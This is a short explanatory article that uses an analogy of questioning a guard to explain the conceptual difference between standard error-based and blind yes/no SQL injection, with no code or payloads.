 
    Many in InfoSec get confused about the difference between standard and blind
    SQL injection. Here’s a simple way to think about it. In both cases you
    are asking questions to an entity in hopes of getting back valuable
    information; the key to standard vs. blind is the type of question you have
    to ask.
  
Standard SQL Injection
    So imagine you’re in some sort of fantasy setting and you come upon a room
    guarded by a soldier. You’re told that you must learn the entire contents of
    the room he’s protecting, but you’re not allowed to go inside to see it
    directly.
    You have to figure it out just by asking the guard questions.
  
    To start with, you ask, “Tell me the Spanish word for the thing closest to
    the door.” The guard answers back, “I don’t know the Spanish word for ‘pile
    of gold'”. You then ask him the Spanish word for the most expensive thing in
    the room, and he responds, “I don’t know the Spanish word for “King’s
    Crown.”
  
    This is something like standard SQL Injection, where you are asking
    the guard to perform some operation on the thing you’re asking for, and when
    it says it doesn’t understand it includes the answer you were looking for.
    This is the all-too-common ‘barf the database error on the screen’ scenario.
  
But that’s old school.
    After a couple of these the guard figures out what you’re doing, and he
    stops giving you valuable information. He thinks he’s smart, so he decides
    that instead of giving long answers that could have information in them, he
    now will only answer yes or no to any question you ask. This is a lot
    like a developer creating a custom error message for his web app when the
    database barfs. If the query returns true you get your standard results, if
    not (for any reason), you get the generic error with no goodies in it.
  
Blind SQL Injection
    So now you just have to come up with a bunch of creative questions that will
    reveal information from nothing but yes/no answers. This is
    blind injection, and it will take much more time, since you’re not
    getting any output, but as long as you’re allowed to just keep asking it’s
    just a matter of getting enough responses.
  
“Does the item by the door start with the letter ‘a’?”
“No.”
“Does the item by the door start with the letter ‘b” ?”
“No.”
    You then go down the list until you hit ‘g”, for gold. Now you move to the
    second letter. And so on.
  
    In the database world this sounds something like, “Does the first table in
    the database have a first letter higher than ‘a’? If so, your query will go
    through and you’ll get whatever it was you were supposed to get from that
    page. If not, you’ll get the standardized error page.
  
    So, error equals no, and regular result equals yes. So you keep asking: “Is
    it higher than ‘b’?” And so on.
  
    It takes a while (and a lot of requests and responses), but eventually you
    build out the complete answer. That’s Blind SQL Injection.
  
    TL;DR: Standard SQL Injection works by asking questions that will
    confuse the app into returning answers in an error message. Blind SQL
    Injection works by asking questions that can only have a yes or no answer.
    From there you simply iterate through all your options until all the yes and
    no responses build out your desired results.
  




